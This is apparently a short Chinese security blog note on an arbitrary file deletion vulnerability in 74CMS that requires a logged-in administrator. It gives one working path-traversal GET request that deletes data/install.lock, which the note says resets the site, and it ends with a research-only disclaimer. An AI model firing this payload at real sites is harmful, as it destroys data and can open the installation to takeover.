【笔记】骑士CMS的任意文件删除漏洞
前言
骑士CMS(74CMS)的任意文件删除漏洞
前提条件
- 后台管理员为已登录状态
正文
/data/install.lock:骑士CMS中的install.lock文件被删除后,骑士CMS会恢复出厂设置
1 | GET http://127.0.0.1/admin/admin_article.php?act=del_img&img=../../data/install.lock |
57uv6Z6g55qE5Y2a5a6i
MS4wLjABAAAA5qMD8Gzdcgq7HXUOviKB59i0-ybJ59jJvNzyaPt5XOsVNqP6DU7WLcoAXvdxvYdp💗
本站所有文章仅作技术研究,请勿非法破坏,请遵守相关法律法规,后果自负
- Mastodon Comments
- twikoo